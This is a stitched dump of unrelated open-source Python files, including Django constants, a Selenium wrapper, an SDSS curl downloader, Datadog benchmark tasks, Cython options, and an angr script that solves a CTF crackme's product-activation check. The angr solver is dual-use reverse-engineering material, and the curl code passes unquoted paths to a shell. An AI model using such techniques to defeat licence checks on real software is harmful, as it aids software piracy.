] | 20 | 2020-02-03T00:38:59.000Z | 2022-01-03T13:07:52.000Z | from django.utils.translation import pgettext_lazy
class ProductAvailabilityStatus:
NOT_PUBLISHED = "not-published"
VARIANTS_MISSSING = "variants-missing"
OUT_OF_STOCK = "out-of-stock"
LOW_STOCK = "low-stock"
NOT_YET_AVAILABLE = "not-yet-available"
READY_FOR_PURCHASE = "ready-for-purchase"
@staticmethod
def get_display(status):
if status == ProductAvailabilityStatus.NOT_PUBLISHED:
return pgettext_lazy("Product status", "not published")
elif status == ProductAvailabilityStatus.VARIANTS_MISSSING:
return pgettext_lazy("Product status", "variants missing")
elif status == ProductAvailabilityStatus.OUT_OF_STOCK:
return pgettext_lazy("Product status", "out of stock")
elif status == ProductAvailabilityStatus.LOW_STOCK:
return pgettext_lazy("Product status", "stock running low")
elif status == ProductAvailabilityStatus.NOT_YET_AVAILABLE:
return pgettext_lazy("Product status", "not yet available")
elif status == ProductAvailabilityStatus.READY_FOR_PURCHASE:
return pgettext_lazy("Product status", "ready for purchase")
else:
raise NotImplementedError("Unknown status: %s" % status)
class VariantAvailabilityStatus:
AVAILABLE = "available"
OUT_OF_STOCK = "out-of-stock"
@staticmethod
def get_display(status):
if status == VariantAvailabilityStatus.AVAILABLE:
return pgettext_lazy("Variant status", "available")
elif status == VariantAvailabilityStatus.OUT_OF_STOCK:
return pgettext_lazy("Variant status", "out of stock")
else:
raise NotImplementedError("Unknown status: %s" % status)
class AttributeInputType:
"""The type that we expect to render the attribute's values as."""
DROPDOWN = "dropdown"
MULTISELECT = "multiselect"
CHOICES = [
(DROPDOWN, pgettext_lazy("Attribute input type", "Dropdown")),
(MULTISELECT, pgettext_lazy("Attribute input type", "Multi Select")),
]
# list the input types that cannot be assigned to a variant
NON_ASSIGNABLE_TO_VARIANTS = [MULTISELECT]
| 38.298246 | 77 | 0.690792 |
795ae17ef48dc73966ed0fb0a088bdc009a6273d | 1,571 | py | Python | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | Basic/action.py | Redbuffhu/APP_huanlejiac | 8495a76a5211ea7346a9ed01f348cd81b56197ed | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import time, allure
from selenium.webdriver.support.wait import WebDriverWait
from Basic.utils import log
class ElementActions(object):
def __init__(self, driver):
self.driver = driver
def get_img(self, name='App截图'):
png_data = self.driver.get_screenshot_as_png()
# current_time = time.strftime("_%H:%m:%s_", time.localtime(time.time())) # linux下时间格式
current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()))
current_name = name + current_time + ".png"
print(current_name)
allure.attach(png_data, name=current_name, attachment_type=allure.attachment_type.PNG)
def sleep(self, s, islog=True):
if islog == True:
message = "sleep等待{}s".format(str(s))
log.info(message)
time.sleep(s)
return self
def find_element(self, loc, timeout=10):
"""
二次封装find_element 方法。增加了显示等待和简化参数传递
:param loc: 传入(By.**,'value')解包后为单独的两个值,需要传递两个值
:param timeout: 搜寻等待时间
:return: 返回定位到的元素对象
"""
return WebDriverWait(self.driver, timeout).until(lambda x: x.find_element(*loc))
def click_element(self, loc):
"""
封装点击操作
"""
self.find_element(loc).click()
def input_text(self, loc, text):
"""
封装输入文本操作
:param text: 文本内容
"""
self.fm = self.find_element(loc)
self.fm.clear()
self.fm.send_keys(text)
| 30.803922 | 96 | 0.57161 |
795ae1801ec498cc40edc191369d9fec19f72c7d | 9,674 | py | Python | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 6 | 2019-01-21T03:02:55.000Z | 2022-01-10T00:47:08.000Z | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 23 | 2017-04-10T14:59:57.000Z | 2021-09-24T21:08:36.000Z | python/sdss_access/sync/curl.py | sdss/sdss_access | 04531f969a6eccfb71b78fc604e2381da3249cb4 | [
"BSD-3-Clause"
] | 2 | 2017-07-01T07:02:03.000Z | 2019-04-22T12:49:55.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
# The line above will help with 2to3 support.
import distutils.spawn
import re
import time
from os import popen
from os.path import exists, dirname, join, basename, getsize, getmtime, sep
from datetime import datetime, timedelta
from sdss_access import AccessError
from sdss_access.sync.baseaccess import BaseAccess
from sdss_access import is_posix
try:
from urllib2 import (HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener,
install_opener, urlopen)
except Exception:
from urllib.request import (HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener,
install_opener, urlopen)
class CurlAccess(BaseAccess):
"""Class for providing Curl access to SDSS SAS Paths
"""
remote_scheme = 'https'
access_mode = 'curl'
def __init__(self, label='sdss_curl', stream_count=5, mirror=False, public=False, release=None,
verbose=False):
if not distutils.spawn.find_executable('curl'):
msg = ('cURL does not appear to be installed. To install, the cURL '
'download wizard is located at: https://curl.haxx.se/dlwiz/. '
'Installation tutorials for cURL (software from https://curl.haxx.se) '
'are available online.')
raise AccessError(msg)
super(CurlAccess, self).__init__(stream_count=stream_count, mirror=mirror, public=public,
release=release, verbose=verbose, label=label)
def __repr__(self):
return '<CurlAccess(using="{0}")>'.format(self.netloc)
def get_task_status(self, task=None):
if task:
try:
self.set_url_list(task['source'])
is_there_any_files = len(self.file_line_list) > 0
err = 'Found no files' if not is_there_any_files else ''
except Exception as e:
err = e
is_there_any_files = False
if not is_there_any_files:
raise AccessError("Return code %r\n" % err)
else:
is_there_any_files = False
return is_there_any_files
def set_url_password(self, url_directory):
""" Authorize User on sas"""
url_directory = url_directory.split('sas')[0]
password_mgr = HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, url_directory, self.auth.username, self.auth.password)
handler = HTTPBasicAuthHandler(password_mgr)
opener = build_opener(handler)
opener.open(url_directory)
install_opener(opener)
def get_query_list(self, url_query):
"""Search through user specified "*" options and return all possible and valid url paths"""
# Find query locations and set a descriptive dictionary
query_objects = [{'segment_number': index, 'query_directory': '', 'query_list_index': 0,
'query_list': [], 'query': query.replace('*', '.*')} for index, query in
enumerate(url_query.split('/')) if '*' in query or index == len(url_query.split('/')) - 1]
# Set quick use observables of query_objects
segment_numbers = [query_object['segment_number'] for query_object in query_objects]
max_depth = len(query_objects) - 1
# Set url array used to append user specified urls
query_results = []
# Walk and search through optional branches for potential urls that pass user specifications
query_depth = None
if self.verbose:
print("SDSS_ACCESS> Expanding wildcards %r" % url_query)
while query_depth != 0:
if query_depth is None:
query_depth = 0
# Set branch directory
query_objects[query_depth]['query_directory'] = ''
for segment_index, segment in enumerate(url_query.split('/')[:query_objects[query_depth]['segment_number']]):
if segment_index not in segment_numbers:
query_objects[query_depth]['query_directory'] = '/'.join([query_objects[query_depth]['query_directory'], segment] if query_objects[query_depth]['query_directory'] else [segment])
else:
query_object = query_objects[segment_numbers.index(segment_index)]
query_branch = query_object['query_list'][query_object['query_list_index']]
query_objects[query_depth]['query_directory'] = '/'.join([query_objects[query_depth]['query_directory'], query_branch])
# Get user specified url options at branch directory
try:
query_objects[query_depth]['query_list'] = [item.split('"')[0] for item in re.findall(r'<a href="(%s)%s".*</a></td><td>'%(query_objects[query_depth]['query'], '/' if query_depth != max_depth else ''), urlopen(query_objects[query_depth]['query_directory']).read().decode('utf-8').replace('<tr><td><a href="../">Parent directory/</a></td><td>-</td><td>-</td></tr>', ''))]
except Exception as e:
query_objects[query_depth]['query_list'] = []
if 'Unauthorized' in e:
raise AccessError("Return code %r\n" % e)
# Append full url's that fit user specifications
if query_depth == max_depth and len(query_objects[query_depth]['query_list']):
for item in query_objects[query_depth]['query_list']:
query_results.append('/'.join([query_objects[query_depth]['query_directory'], item]))
# Specify walker logic to recognize when to step down the branch or back up and go to the next option
if not len(query_objects[query_depth]['query_list']) or query_depth == max_depth:
query_depth -= 1
while query_depth > -1 and query_objects[query_depth]['query_list_index'] == len(query_objects[query_depth]['query_list'])-1:
query_objects[query_depth]['query_list_index'] = 0
query_depth -= 1
query_objects[query_depth]['query_list_index'] += 1
query_depth += 1
else:
query_depth += 1
return query_results
def set_url_list(self, query_path=None):
"""Gets url paths from get_query_list and returns file proparties and path"""
if not is_posix:
query_path = query_path.replace(sep, '/')
if not self.public:
self.set_url_password(query_path)
self.file_line_list, self.file_size_list, self.file_date_list, self.url_list = [], [], [], []
for url in self.get_query_list(query_path):
file_line, file_size, file_date = re.findall(r'<a href="(%s)".*</a></td><td>\s*(\d*)</td><td>(.*)</td></tr>\r' % basename(url), urlopen(dirname(url)).read().decode('utf-8'))[0]
self.url_list.append(url)
self.file_line_list.append(file_line.split('"')[0])
self.file_size_list.append(file_size)
self.file_date_list.append(file_date)
def generate_stream_task(self, task=None, out=None):
''' creates the task to put in the download stream '''
if task:
location = task['location']
for filename, file_size, file_date, url in zip(self.file_line_list, self.file_size_list, self.file_date_list, self.url_list):
location = url.split('/sas/')[-1]
source = join(self.stream.source, location) if self.remote_base else None
destination = join(self.stream.destination, location)
if not is_posix:
source = source.replace(sep, '/')
destination = destination.replace('/', sep)
location = location.replace('/', sep)
if not self.check_file_exists_locally(destination, file_size, file_date):
yield (location, source, destination)
def check_file_exists_locally(self, destination=None, url_file_size=None, url_file_time=None):
"""Checks if file already exists (note that time check is only accurate to the minute)"""
if exists(destination):
existing_file_size = int(popen('gzip -l %s' % destination).readlines()[1].split()[0]) if '.gz' in destination else getsize(destination)
url_file_time = datetime.strptime(url_file_time, "%Y-%b-%d %H:%M" if len(url_file_time.split('-')[0]) == 4 else "%d-%b-%Y %H:%M")
local_file_time = datetime.utcfromtimestamp(getmtime(destination))
url_file_time = url_file_time + timedelta(seconds=time.altzone if time.daylight else time.timezone)
if existing_file_size == int(url_file_size) and abs(url_file_time - local_file_time).seconds < 60:
print('Already Downloaded at %s' % destination)
return True
else:
return False
else:
return False
def set_stream_task(self, task=None):
status = self.get_task_status(task=task)
if status:
super(CurlAccess, self).set_stream_task(task=task)
def _get_sas_module(self):
''' gets the sas module used when committing the download '''
return "sas"
def _get_stream_command(self):
''' gets the stream command used when committing the download '''
auth = ''
if self.auth.username and self.auth.password:
auth = '-u {0}:{1}'.format(self.auth.username, self.auth.password)
return "curl {0} --create-dirs --fail -sSRLK {{path}}".format(auth)
| 50.649215 | 385 | 0.625698 |
795ae39331009dda57bb875136a82de0c3647342 | 392 | py | Python | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | neowand/wsgi.py | ShareDVI/NeoWand | a94e1acd435d334bdba759d5a0b2eb0a46f53af4 | [
"MIT"
] | null | null | null | """
WSGI config for neowand project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "neowand.settings")
application = get_wsgi_application()
| 23.058824 | 78 | 0.785714 |
795ae3b72d76eebbb9c0955de60ccd5f2a2d1d25 | 308 | py | Python | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | 2 | 2020-03-16T14:57:44.000Z | 2020-11-29T07:45:54.000Z | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | null | null | null | 18 Regular Expressions/specialcharacters.py | Himanshu44626748/Learn-Python | f3a4d997f2d29b146e5f7434f4801ae94bc3483f | [
"MIT"
] | 1 | 2020-08-13T07:59:02.000Z | 2020-08-13T07:59:02.000Z | '''
\
.
^ - searches from beginning
$
[...]
[^....]
(...)
(R | S) can use 2 regular expressions, either this or that will be executed
'''
import re
str = "Take up 1 1-03-2019 one 23 idea.One 567idea at a time 20-1-2021"
result = re.findall(r'^T\w*',str)
print(result) | 17.111111 | 95 | 0.545455 |
795ae46ded125414be206af2775ab0ddca604626 | 204 | py | Python | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | RecoEgamma/EgammaIsolationAlgos/python/pfBlockBasedIsolation_cfi.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
pfBlockBasedIsolation = cms.PSet(
#required inputs
ComponentName = cms.string('pfBlockBasedIsolation'),
coneSize = cms.double(9999999999)
)
| 18.545455 | 56 | 0.720588 |
795ae53f39bfa73cc04a7435ecee3e1eee316751 | 2,546 | py | Python | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | 2 | 2021-11-13T16:28:04.000Z | 2022-02-24T16:56:15.000Z | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | null | null | null | WindowManager.py | Bob-Z/RandoMame | 2073d0f1f3de6b7c2f7c090ee79509adb2a1d302 | [
"Apache-2.0"
] | 1 | 2021-11-13T16:26:19.000Z | 2021-11-13T16:26:19.000Z | import sys
import time
import Mode
import Config
import Desktop
import Display
import Window
import Sound
import Record
import XmlGetter
import os
from Desktop import DesktopClass
from WindowPosition import WindowPosition
running = True
sound_index = 0
window = []
start_command_launched = False
def start():
global window
window_position = WindowPosition()
if Config.desktop is not None:
desktop_info = [Config.desktop[0], Config.desktop[1], Config.desktop[2], Config.desktop[3]]
else:
desktop_info = Desktop.get_desktop_size()
position = window_position.get(Config.windows_quantity, 0, 0, desktop_info[2], desktop_info[3])
Display.init(desktop_info)
if Config.mode == "music" or Config.smart_sound_timeout_sec > 0:
Sound.init()
machine_list, soft_list = XmlGetter.get()
if machine_list is not None:
print("MAME version: ", machine_list.attrib["build"])
print(len(machine_list), " unique machines")
if soft_list is not None:
print(len(soft_list), " softwares lists")
Mode.init(machine_list, soft_list)
desktop = DesktopClass()
for index in range(Config.windows_quantity):
window.append(Window.Window(desktop, index, desktop_info[0], desktop_info[1], position[index]))
global sound_index
while Display.wait_for_keyboard() is False:
if Config.smart_sound_timeout_sec > 0:
if Sound.get_silence_duration_sec() > Config.smart_sound_timeout_sec:
sound_index = sound_index - 1
if sound_index == -1:
sound_index = Config.windows_quantity - 1
for w in window:
w.set_sound_index(sound_index)
Sound.reset()
is_alive = False
for w in window:
if w.is_alive() is True:
is_alive = True
break
if is_alive is False:
break
if Config.end_duration is not None:
if Config.record is None:
time.sleep(float(Config.end_duration))
if Config.end_command is not None and window[0].get_start_command_launched() is True:
print("Execute end command:", Config.end_command)
os.system(Config.end_command)
print("Shutdown remaining windows")
shutdown()
print("Stop sound recording thread")
Sound.kill()
print("Wait for remaining windows")
for w in window:
w.join()
sys.exit(0)
def shutdown():
global window
for w in window:
w.stop()
| 24.480769 | 103 | 0.649647 |
795ae6aada3c5543b959d24a7d6b449c95e9d7bc | 2,363 | py | Python | examples/google2016_unbreakable_1/solve.py | Alex97/angr-doc | fb28648694e9edb52b3726a3434b6c6e35966289 | [
"BSD-2-Clause"
] | 1 | 2021-08-30T06:56:31.000Z | 2021-08-30T06:56:31.000Z | examples/google2016_unbreakable_1/solve.py | pcy190/angr-doc | c2465b4ecbb44fe3c201bd76f2a7b2306c278c7f | [
"BSD-2-Clause"
] | null | null | null | examples/google2016_unbreakable_1/solve.py | pcy190/angr-doc | c2465b4ecbb44fe3c201bd76f2a7b2306c278c7f | [
"BSD-2-Clause"
] | 1 | 2022-03-31T07:42:51.000Z | 2022-03-31T07:42:51.000Z | #!/usr/bin/env python2
"""
In this challenge we are given a binary that checks an input given as a
command line argument. If it is correct, 'Thank you - product activated!' is
printed. If it is incorrect, 'Product activation failure %d' is printed with a
specific error code.
Reversing shows that the program verifies that various operations on specific
characters of input are equal to zero. Because of the program's linear nature
and reliance on verbose constraints, angr is perfect for solving this challenge
quickly. On a virtual machine, it took ~7 seconds to solve.
Author: scienceman (@docileninja)
Team: bitsforeveryone (USMA)
"""
import angr
START_ADDR = 0x4005bd # first part of program that does computation
AVOID_ADDR = 0x400850 # address of function that prints wrong
FIND_ADDR = 0x400830 # address of function that prints correct
INPUT_ADDR = 0x6042c0 # location in memory of user input
INPUT_LENGTH = 0xf2 - 0xc0 + 1 # derived from the first and last character
# reference in data
def extract_memory(state):
"""Convience method that returns the flag input memory."""
return state.solver.eval(state.memory.load(INPUT_ADDR, INPUT_LENGTH), cast_to=bytes)
def char(state, n):
"""Returns a symbolic BitVector and contrains it to printable chars for a given state."""
vec = state.solver.BVS('c{}'.format(n), 8, explicit_name=True)
return vec, state.solver.And(vec >= ord(' '), vec <= ord('~'))
def main():
p = angr.Project('unbreakable')
print('adding BitVectors and constraints')
state = p.factory.blank_state(addr=START_ADDR, add_options={angr.options.LAZY_SOLVES})
for i in range(INPUT_LENGTH):
c, cond = char(state, i)
# the first command line argument is copied to INPUT_ADDR in memory
# so we store the BitVectors for angr to manipulate
state.memory.store(INPUT_ADDR + i, c)
state.add_constraints(cond)
print('creating simgr')
ex = p.factory.simulation_manager(state)
print('running explorer')
ex.explore(find=(FIND_ADDR,), avoid=(AVOID_ADDR,))
flag = extract_memory(ex.one_found) # ex.one_found is equiv. to ex.found[0]
print('found flag: {}'.format(flag))
return flag
def test():
assert main() == b'CTF{0The1Quick2Brown3Fox4Jumped5Over6The7Lazy8Fox9}'
if __name__ == '__main__':
main()
| 36.353846 | 93 | 0.714769 |
795ae78cff0cef2e3b763e737f8aea64524869d0 | 3,958 | py | Python | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 1 | 2021-01-28T14:23:38.000Z | 2021-01-28T14:23:38.000Z | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 3 | 2020-11-28T18:07:27.000Z | 2021-03-24T17:23:50.000Z | tasks/bench.py | KSerrania/datadog-agent | e1819b7bd2007a8fa82956bff22d03bf5a18617f | [
"Apache-2.0"
] | 1 | 2021-06-24T06:41:48.000Z | 2021-06-24T06:41:48.000Z | """
Benchmarking tasks
"""
from __future__ import print_function
import os
import sys
from invoke import task
from .build_tags import get_default_build_tags
from .utils import REPO_PATH, bin_name, get_git_branch_name
# constants
BENCHMARKS_BIN_PATH = os.path.join(".", "bin", "benchmarks")
@task
def build_aggregator(ctx, rebuild=False, arch="x64"):
"""
Build the Aggregator benchmarks.
"""
build_tags = get_default_build_tags(build="test", arch=arch) # pass all the build flags
ldflags = ""
gcflags = ""
if os.environ.get("DELVE"):
gcflags = "-N -l"
if sys.platform == 'win32':
# On windows, need to build with the extra argument -ldflags="-linkmode internal"
# if you want to be able to use the delve debugger.
ldflags += " -linkmode internal"
cmd = "go build -mod={go_mod} {build_type} -tags \"{build_tags}\" -o {bin_name} "
cmd += "{ldflags} {gcflags} {REPO_PATH}/test/benchmarks/aggregator"
args = {
"go_mod": "vendor",
"build_type": "-a" if rebuild else "",
"build_tags": " ".join(build_tags),
"bin_name": os.path.join(BENCHMARKS_BIN_PATH, bin_name("aggregator")),
"ldflags": ldflags,
"gcflags": gcflags,
"REPO_PATH": REPO_PATH,
}
ctx.run(cmd.format(**args))
@task
def build_dogstatsd(ctx, arch="x64"):
"""
Build Dogstatsd benchmarks.
"""
build_tags = get_default_build_tags(build="test", arch=arch) # pass all the build flags
cmd = "go build -mod={go_mod} -tags \"{build_tags}\" -o {bin_name} {REPO_PATH}/test/benchmarks/dogstatsd"
args = {
"go_mod": "vendor",
"build_tags": " ".join(build_tags),
"bin_name": os.path.join(BENCHMARKS_BIN_PATH, bin_name("dogstatsd")),
"REPO_PATH": REPO_PATH,
}
ctx.run(cmd.format(**args))
@task
def build_kubernetes_state(ctx, arch="x64"):
"""
Build Kubernetes_State benchmarks.
"""
build_tags = get_default_build_tags(build="test", arch=arch) # pass all the build flags
cmd = "go build -mod={go_mod} -tags \"{build_tags}\" -o {bin_name} {REPO_PATH}/test/benchmarks/kubernetes_state"
args = {
"go_mod": "vendor",
"build_tags": " ".join(build_tags),
"bin_name": os.path.join(BENCHMARKS_BIN_PATH, bin_name("kubernetes_state")),
"REPO_PATH": REPO_PATH,
}
ctx.run(cmd.format(**args))
@task(pre=[build_dogstatsd])
def dogstatsd(ctx):
"""
Run Dogstatsd Benchmarks.
"""
bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("dogstatsd"))
branch_name = os.environ.get("DD_REPO_BRANCH_NAME") or get_git_branch_name()
options = "-branch {}".format(branch_name)
key = os.environ.get("DD_AGENT_API_KEY")
if key:
options += " -api-key {}".format(key)
ctx.run("{} -pps=5000 -dur 45 -ser 5 -brk -inc 1000 {}".format(bin_path, options))
# Temporarily keep compatibility after typo fix
@task(pre=[build_dogstatsd])
def dogstastd(ctx):
dogstatsd(ctx)
@task(pre=[build_aggregator])
def aggregator(ctx):
"""
Run the Aggregator Benchmarks.
"""
bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("aggregator"))
branch_name = os.environ.get("DD_REPO_BRANCH_NAME") or get_git_branch_name()
options = "-branch {}".format(branch_name)
key = os.environ.get("DD_AGENT_API_KEY")
if key:
options += " -api-key {}".format(key)
ctx.run("{} -points 2,10,100,500,1000 -series 10,100,1000 -log-level info -json {}".format(bin_path, options))
ctx.run(
"{} -points 2,10,100,500,1000 -series 10,100,1000 -log-level info -json -memory -duration 10 {}".format(
bin_path, options
)
)
@task(pre=[build_kubernetes_state])
def kubernetes_state(ctx):
"""
Run Kubernetes_State Benchmarks.
"""
bin_path = os.path.join(BENCHMARKS_BIN_PATH, bin_name("kubernetes_state"))
ctx.run("{}".format(bin_path))
| 29.537313 | 116 | 0.641738 |
795ae86edd00ef5e80e8da261409680fc1959e84 | 11,167 | py | Python | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | 2 | 2021-08-20T02:33:24.000Z | 2021-11-17T10:54:00.000Z | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | null | null | null | Cython/Compiler/Options.py | felix-salfelder/cython | 5446ec2921d6247611978cd17c66e215421b20c4 | [
"Apache-2.0"
] | null | null | null | #
# Cython - Compilation-wide options and pragma declarations
#
# Perform lookups on builtin names only once, at module initialisation
# time. This will prevent the module from getting imported if a
# builtin name that it uses cannot be found during initialisation.
cache_builtins = True
embed_pos_in_docstring = False
gcc_branch_hints = True
pre_import = None
docstrings = True
# Decref global variables in this module on exit for garbage collection.
# 0: None, 1+: interned objects, 2+: cdef globals, 3+: types objects
# Mostly for reducing noise for Valgrind, only executes at process exit
# (when all memory will be reclaimed anyways).
generate_cleanup_code = False
annotate = False
# This will abort the compilation on the first error occured rather than trying
# to keep going and printing further error messages.
fast_fail = False
# Make all warnings into errors.
warning_errors = False
# Make unknown names an error. Python raises a NameError when
# encountering unknown names at runtime, whereas this option makes
# them a compile time error. If you want full Python compatibility,
# you should disable this option and also 'cache_builtins'.
error_on_unknown_names = True
# Make uninitialized local variable reference a compile time error.
# Python raises UnboundLocalError at runtime, whereas this option makes
# them a compile time error. Note that this option affects only variables
# of "python object" type.
error_on_uninitialized = True
# This will convert statements of the form "for i in range(...)"
# to "for i from ..." when i is a cdef'd integer type, and the direction
# (i.e. sign of step) can be determined.
# WARNING: This may change the semantics if the range causes assignment to
# i to overflow. Specifically, if this option is set, an error will be
# raised before the loop is entered, wheras without this option the loop
# will execute until an overflowing value is encountered.
convert_range = True
# Enable this to allow one to write your_module.foo = ... to overwrite the
# definition if the cpdef function foo, at the cost of an extra dictionary
# lookup on every call.
# If this is 0 it simply creates a wrapper.
lookup_module_cpdef = False
# Whether or not to embed the Python interpreter, for use in making a
# standalone executable or calling from external libraries.
# This will provide a method which initalizes the interpreter and
# executes the body of this module.
embed = None
# In previous iterations of Cython, globals() gave the first non-Cython module
# globals in the call stack. Sage relies on this behavior for variable injection.
old_style_globals = False
# Allows cimporting from a pyx file without a pxd file.
cimport_from_pyx = False
# max # of dims for buffers -- set lower than number of dimensions in numpy, as
# slices are passed by value and involve a lot of copying
buffer_max_dims = 8
# Number of function closure instances to keep in a freelist (0: no freelists)
closure_freelist_size = 8
# Declare compiler directives
directive_defaults = {
'boundscheck' : True,
'nonecheck' : False,
'initializedcheck' : True,
'embedsignature' : False,
'locals' : {},
'auto_cpdef': False,
'cdivision': False, # was True before 0.12
'cdivision_warnings': False,
'overflowcheck': False,
'overflowcheck.fold': True,
'always_allow_keywords': False,
'allow_none_for_extension_args': True,
'wraparound' : True,
'ccomplex' : False, # use C99/C++ for complex types and arith
'callspec' : "",
'final' : False,
'internal' : False,
'profile': False,
'linetrace': False,
'infer_types': None,
'infer_types.verbose': False,
'autotestdict': True,
'autotestdict.cdef': False,
'autotestdict.all': False,
'language_level': 2,
'fast_getattr': False, # Undocumented until we come up with a better way to handle this everywhere.
'py2_import': False, # For backward compatibility of Cython's source code in Py3 source mode
'c_string_type': 'bytes',
'c_string_encoding': '',
'type_version_tag': True, # enables Py_TPFLAGS_HAVE_VERSION_TAG on extension types
# set __file__ and/or __path__ to known source/target path at import time (instead of not having them available)
'set_initial_path' : None, # SOURCEFILE or "/full/path/to/module"
'warn': None,
'warn.undeclared': False,
'warn.unreachable': True,
'warn.maybe_uninitialized': False,
'warn.unused': False,
'warn.unused_arg': False,
'warn.unused_result': False,
# optimizations
'optimize.inline_defnode_calls': True,
# remove unreachable code
'remove_unreachable': True,
# control flow debug directives
'control_flow.dot_output': "", # Graphviz output filename
'control_flow.dot_annotate_defs': False, # Annotate definitions
# test support
'test_assert_path_exists' : [],
'test_fail_if_path_exists' : [],
# experimental, subject to change
'binding': None,
'experimental_cpp_class_def': False,
'freelist': 0,
}
# Extra warning directives
extra_warnings = {
'warn.maybe_uninitialized': True,
'warn.unreachable': True,
'warn.unused': True,
}
def one_of(*args):
def validate(name, value):
if value not in args:
raise ValueError("%s directive must be one of %s, got '%s'" % (
name, args, value))
else:
return value
return validate
def normalise_encoding_name(option_name, encoding):
"""
>>> normalise_encoding_name('c_string_encoding', 'ascii')
'ascii'
>>> normalise_encoding_name('c_string_encoding', 'AsCIi')
'ascii'
>>> normalise_encoding_name('c_string_encoding', 'us-ascii')
'ascii'
>>> normalise_encoding_name('c_string_encoding', 'utF8')
'utf8'
>>> normalise_encoding_name('c_string_encoding', 'utF-8')
'utf8'
>>> normalise_encoding_name('c_string_encoding', 'deFAuLT')
'default'
>>> normalise_encoding_name('c_string_encoding', 'default')
'default'
>>> normalise_encoding_name('c_string_encoding', 'SeriousLyNoSuch--Encoding')
'SeriousLyNoSuch--Encoding'
"""
if not encoding:
return ''
if encoding.lower() in ('default', 'ascii', 'utf8'):
return encoding.lower()
import codecs
try:
decoder = codecs.getdecoder(encoding)
except LookupError:
return encoding # may exists at runtime ...
for name in ('ascii', 'utf8'):
if codecs.getdecoder(name) == decoder:
return name
return encoding
# Override types possibilities above, if needed
directive_types = {
'final' : bool, # final cdef classes and methods
'internal' : bool, # cdef class visibility in the module dict
'infer_types' : bool, # values can be True/None/False
'binding' : bool,
'cfunc' : None, # decorators do not take directive value
'ccall' : None,
'cclass' : None,
'returns' : type,
'set_initial_path': str,
'freelist': int,
'c_string_type': one_of('bytes', 'str', 'unicode'),
'c_string_encoding': normalise_encoding_name,
}
for key, val in directive_defaults.items():
if key not in directive_types:
directive_types[key] = type(val)
directive_scopes = { # defaults to available everywhere
# 'module', 'function', 'class', 'with statement'
'final' : ('cclass', 'function'),
'internal' : ('cclass',),
'autotestdict' : ('module',),
'autotestdict.all' : ('module',),
'autotestdict.cdef' : ('module',),
'set_initial_path' : ('module',),
'test_assert_path_exists' : ('function', 'class', 'cclass'),
'test_fail_if_path_exists' : ('function', 'class', 'cclass'),
'freelist': ('cclass',),
# Avoid scope-specific to/from_py_functions for c_string.
'c_string_type': ('module',),
'c_string_encoding': ('module',),
'type_version_tag': ('module', 'cclass'),
}
def parse_directive_value(name, value, relaxed_bool=False):
"""
Parses value as an option value for the given name and returns
the interpreted value. None is returned if the option does not exist.
>>> print parse_directive_value('nonexisting', 'asdf asdfd')
None
>>> parse_directive_value('boundscheck', 'True')
True
>>> parse_directive_value('boundscheck', 'true')
Traceback (most recent call last):
...
ValueError: boundscheck directive must be set to True or False, got 'true'
>>> parse_directive_value('c_string_encoding', 'us-ascii')
'ascii'
>>> parse_directive_value('c_string_type', 'str')
'str'
>>> parse_directive_value('c_string_type', 'bytes')
'bytes'
>>> parse_directive_value('c_string_type', 'unicode')
'unicode'
>>> parse_directive_value('c_string_type', 'unnicode')
Traceback (most recent call last):
